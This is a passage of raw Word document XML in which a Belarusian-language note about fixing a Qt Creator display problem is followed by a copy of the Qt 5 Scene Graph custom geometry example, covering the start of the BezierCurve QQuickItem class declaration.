          <w:szCs w:val="24"/>
          <w:lang w:val="be-BY"/>
        </w:rPr>
        <w:t>_</w:t>
      </w:r>
      <w:r w:rsidR="002E0396">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:i/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>VISUALIZATION</w:t>
      </w:r>
      <w:r w:rsidR="002E0396">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:i/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="be-BY"/>
        </w:rPr>
        <w:t>, у мяне пачаткова старонка кріэйтара пачала з’яўляцца ў зялёна-сініх колерах.</w:t>
      </w:r>
      <w:r w:rsidR="001A1A94">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:i/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="be-BY"/>
        </w:rPr>
        <w:t xml:space="preserve"> Праблема была ў тым, што </w:t>
      </w:r>
      <w:r w:rsidR="001A1A94">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:i/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="be-BY"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">я прапісаў яе як сістэмную зменную для ўсёй </w:t>
      </w:r>
      <w:r w:rsidR="001A1A94">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:i/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Windows</w:t>
      </w:r>
      <w:r w:rsidR="001A1A94">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:i/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="be-BY"/>
        </w:rPr>
        <w:t xml:space="preserve">. Як толькі я гэта змяніў, </w:t>
      </w:r>
      <w:r w:rsidR="001A1A94">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:i/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Creator</w:t>
      </w:r>
      <w:r w:rsidR="001A1A94" w:rsidRPr="00B31A2B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:i/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="be-BY"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="001A1A94">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:i/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="be-BY"/>
        </w:rPr>
        <w:t>пачаў працаваць добра.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="001A1A94" w:rsidRPr="001A1A94" w:rsidRDefault="001A1A94" w:rsidP="00D143AF">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:i/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="be-BY"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00AE08BB" w:rsidRPr="00D94480" w:rsidRDefault="00490E7E" w:rsidP="00AE08BB">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="374" w:lineRule="atLeast"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="be-BY"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="rId2116" w:history="1">
        <w:r w:rsidR="00AE08BB" w:rsidRPr="00F24B8D">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>http</w:t>
        </w:r>
        <w:r w:rsidR="00AE08BB" w:rsidRPr="00D94480">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:lang w:val="be-BY"/>
          </w:rPr>
          <w:t>://</w:t>
        </w:r>
        <w:r w:rsidR="00AE08BB" w:rsidRPr="00F24B8D">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>doc</w:t>
        </w:r>
        <w:r w:rsidR="00AE08BB" w:rsidRPr="00D94480">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:lang w:val="be-BY"/>
          </w:rPr>
          <w:t>.</w:t>
        </w:r>
        <w:r w:rsidR="00AE08BB" w:rsidRPr="00F24B8D">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>qt</w:t>
        </w:r>
        <w:r w:rsidR="00AE08BB" w:rsidRPr="00D94480">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:lang w:val="be-BY"/>
          </w:rPr>
          <w:t>.</w:t>
        </w:r>
        <w:r w:rsidR="00AE08BB" w:rsidRPr="00F24B8D">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>io</w:t>
        </w:r>
        <w:r w:rsidR="00AE08BB" w:rsidRPr="00D94480">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:lang w:val="be-BY"/>
          </w:rPr>
          <w:t>/</w:t>
        </w:r>
        <w:r w:rsidR="00AE08BB" w:rsidRPr="00F24B8D">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>qt</w:t>
        </w:r>
        <w:r w:rsidR="00AE08BB" w:rsidRPr="00D94480">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:lang w:val="be-BY"/>
          </w:rPr>
          <w:t>-5/</w:t>
        </w:r>
        <w:r w:rsidR="00AE08BB" w:rsidRPr="00F24B8D">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>qtquick</w:t>
        </w:r>
        <w:r w:rsidR="00AE08BB" w:rsidRPr="00D94480">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:lang w:val="be-BY"/>
          </w:rPr>
          <w:t>-</w:t>
        </w:r>
        <w:r w:rsidR="00AE08BB" w:rsidRPr="00F24B8D">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>scenegraph</w:t>
        </w:r>
        <w:r w:rsidR="00AE08BB" w:rsidRPr="00D94480">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:lang w:val="be-BY"/>
          </w:rPr>
          <w:t>-</w:t>
        </w:r>
        <w:r w:rsidR="00AE08BB" w:rsidRPr="00F24B8D">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>customgeometry</w:t>
        </w:r>
        <w:r w:rsidR="00AE08BB" w:rsidRPr="00D94480">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:lang w:val="be-BY"/>
          </w:rPr>
          <w:t>-</w:t>
        </w:r>
        <w:r w:rsidR="00AE08BB" w:rsidRPr="00F24B8D">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>example</w:t>
        </w:r>
        <w:r w:rsidR="00AE08BB" w:rsidRPr="00D94480">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:lang w:val="be-BY"/>
          </w:rPr>
          <w:t>.</w:t>
        </w:r>
        <w:r w:rsidR="00AE08BB" w:rsidRPr="00F24B8D">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>html</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="00AE08BB" w:rsidRPr="00AE08BB" w:rsidRDefault="00AE08BB" w:rsidP="00081348">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="404244"/>
          <w:spacing w:val="-15"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="1790" w:name="_Toc483000918"/>
      <w:bookmarkStart w:id="1791" w:name="_Toc483003909"/>
      <w:bookmarkStart w:id="1792" w:name="_Toc483604261"/>
      <w:bookmarkStart w:id="1793" w:name="_Toc483605481"/>
      <w:r w:rsidRPr="00081348">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="404244"/>
          <w:spacing w:val="-15"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Scene Graph - Custom Geometry</w:t>
      </w:r>
      <w:bookmarkEnd w:id="1790"/>
      <w:bookmarkEnd w:id="1791"/>
      <w:bookmarkEnd w:id="1792"/>
      <w:bookmarkEnd w:id="1793"/>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AE08BB">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">The custom geometry example </w:t>
      </w:r>
      <w:r w:rsidRPr="00DC2BC3">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>shows how to create a</w:t>
      </w:r>
      <w:r w:rsidRPr="00DC2BC3">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:hyperlink r:id="rId2117" w:history="1">
        <w:r w:rsidRPr="00DC2BC3">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:color w:val="17A81A"/>
            <w:highlight w:val="yellow"/>
            <w:u w:val="none"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>QQuickItem</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00AE08BB">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="00AE08BB">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">which uses the </w:t>
      </w:r>
      <w:r w:rsidRPr="00DC2BC3">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>scene graph API to build a custom geometry</w:t>
      </w:r>
      <w:r w:rsidRPr="00AE08BB">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> for the scene graph. It does this by creating a BezierCurve item which is made part of the CustomGeometry module and makes use of this in a QML file.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00AE08BB" w:rsidRPr="00AE08BB" w:rsidRDefault="00AE08BB" w:rsidP="00AE08BB">
      <w:pPr>
        <w:pStyle w:val="centeralign"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="360" w:afterAutospacing="0" w:line="374" w:lineRule="atLeast"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AE08BB">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
        </w:rPr>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidRPr="00AE08BB">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
        </w:rPr>
        <w:instrText xml:space="preserve"> INCLUDEPICTURE "http://doc.qt.io/qt-5/images/custom-geometry-example.png" \* MERGEFORMATINET </w:instrText>
      </w:r>
      <w:r w:rsidRPr="00AE08BB">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
        </w:rPr>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="00B31A2B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
        </w:rPr>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidR="00B31A2B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
        </w:rPr>
        <w:instrText xml:space="preserve"> INCLUDEPICTURE  "http://doc.qt.io/qt-5/images/custom-geometry-example.png" \* MERGEFORMATINET </w:instrText>
      </w:r>
      <w:r w:rsidR="00B31A2B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
        </w:rPr>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="000C4D6F">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
        </w:rPr>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidR="000C4D6F">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
        </w:rPr>
        <w:instrText xml:space="preserve"> INCLUDEPICTURE  "http://doc.qt.io/qt-5/images/custom-geometry-example.png" \* MERGEFORMATINET </w:instrText>
      </w:r>
      <w:r w:rsidR="000C4D6F">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"http://doc.qt.io/qt-5/images/custom-geometry-example.png"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"http://doc.qt.io/qt-5/images/custom-geometry-example.png"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"http://doc.qt.io/qt-5/images/custom-geometry-example.png"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"http://doc.qt.io/qt-5/images/custom-geometry-example.png"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"http://doc.qt.io/qt-5/images/custom-geometry-example.png"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"http://doc.qt.io/qt-5/images/custom-geometry-example.png"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"http://doc.qt.io/qt-5/images/custom-geometry-example.png"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"http://doc.qt.io/qt-5/images/custom-geometry-example.png"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"http://doc.qt.io/qt-5/images/custom-geometry-example.png"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"http://doc.qt.io/qt-5/images/custom-geometry-example.png"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"http://doc.qt.io/qt-5/images/custom-geometry-example.png"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"http://doc.qt.io/qt-5/images/custom-geometry-example.png"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"http://doc.qt.io/qt-5/images/custom-geometry-example.png"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"http://doc.qt.io/qt-5/images/custom-geometry-example.png" \* MERGEFORMATINET </w:instrText>
      </w:r>
      <w:r w:rsidR="00490E7E">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
        </w:rPr>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="002230B8">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
        </w:rPr>
        <w:pict>
          <v:shape id="_x0000_i1051" type="#_x0000_t75" alt="" style="width:3in;height:2in">
            <v:imagedata r:id="rId2118" r:href="rId2119"/>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000C4D6F">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r w:rsidR="00B31A2B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r w:rsidRPr="00AE08BB">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
    </w:p>
    <w:p w:rsidR="00AE08BB" w:rsidRPr="00AE08BB" w:rsidRDefault="00AE08BB" w:rsidP="00081348">
      <w:pPr>
        <w:pStyle w:val="4"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="1794" w:name="beziercurve-declaration"/>
      <w:bookmarkStart w:id="1795" w:name="_Toc483000919"/>
      <w:bookmarkStart w:id="1796" w:name="_Toc483003910"/>
      <w:bookmarkStart w:id="1797" w:name="_Toc483604262"/>
      <w:bookmarkStart w:id="1798" w:name="_Toc483605482"/>
      <w:bookmarkEnd w:id="1794"/>
      <w:r w:rsidRPr="00081348">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>BezierCurve Declaration</w:t>
      </w:r>
      <w:bookmarkEnd w:id="1795"/>
      <w:bookmarkEnd w:id="1796"/>
      <w:bookmarkEnd w:id="1797"/>
      <w:bookmarkEnd w:id="1798"/>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com"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="55FFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>#include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&lt;</w:t>
      </w:r>
      <w:r w:rsidRPr="00AE08BB">
        <w:rPr>
          <w:rStyle w:val="typ"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="4F9D08"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>QtQuick</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QQuickItem</w:t>
      </w:r>
      <w:r w:rsidRPr="00AE08BB">
        <w:rPr>
          <w:rStyle w:val="pun"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>&gt;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kwd"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFF55"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>class</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BezierCurve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public</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QQuickItem</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Q_OBJECT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Q_PROPERTY</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p1 READ p1 WRITE setP1 NOTIFY p1Changed</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Q_PROPERTY</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p2 READ p2 WRITE setP2 NOTIFY p2Changed</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Q_PROPERTY</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p3 READ p3 WRITE setP3 NOTIFY p3Changed</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Q_PROPERTY</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p4 READ p4 WRITE setP4 NOTIFY p4Changed</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Q_PROPERTY</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int</w:t>
      </w:r>
      <w:r w:rsidRPr="00AE08BB">
        <w:rPr>
          <w:rStyle w:val="pln"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> segmentCount READ segmentCount WRITE setSegmentCount NOTIFY segmentCountChanged</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kwd"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFF55"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>public</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BezierCurve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QQuickItem</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parent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BezierCurve</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QSGNode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updatePaintNode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QSGNode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UpdatePaintNodeData</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p1</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return</w:t>
      </w:r>
      <w:r w:rsidRPr="00AE08BB">
        <w:rPr>
          <w:rStyle w:val="pln"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> m_p1</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p2</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return</w:t>
      </w:r>
      <w:r w:rsidRPr="00AE08BB">
        <w:rPr>
          <w:rStyle w:val="pln"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> m_p2</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p3</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return</w:t>
      </w:r>
      <w:r w:rsidRPr="00AE08BB">
        <w:rPr>
          <w:rStyle w:val="pln"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> m_p3</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p4</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return</w:t>
      </w:r>
      <w:r w:rsidRPr="00AE08BB">
        <w:rPr>
          <w:rStyle w:val="pln"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> m_p4</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lastRenderedPageBreak/>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:r w:rsidRPr="00AE08BB">
        <w:rPr>
          <w:rStyle w:val="kwd"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFF55"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>int</w:t>
      </w:r>
      <w:r w:rsidRPr="00AE08BB">
        <w:rPr>
          <w:rStyle w:val="pln"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> segmentCount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return</w:t>
      </w:r>
      <w:r w:rsidRPr="00AE08BB">
        <w:rPr>
          <w:rStyle w:val="pln"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> m_segmentCount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void</w:t>
      </w:r>
      <w:r w:rsidRPr="00AE08BB">
        <w:rPr>
          <w:rStyle w:val="pln"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> setP1</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&amp;</w:t>
      </w:r>
      <w:r w:rsidRPr="00AE08BB">
        <w:rPr>
          <w:rStyle w:val="pln"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>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void</w:t>
      </w:r>
      <w:r w:rsidRPr="00AE08BB">
        <w:rPr>
          <w:rStyle w:val="pln"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> setP2</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&amp;</w:t>
      </w:r>
      <w:r w:rsidRPr="00AE08BB">
        <w:rPr>
          <w:rStyle w:val="pln"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>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void</w:t>
      </w:r>
      <w:r w:rsidRPr="00AE08BB">
        <w:rPr>
          <w:rStyle w:val="pln"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> setP3</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&amp;</w:t>
      </w:r>
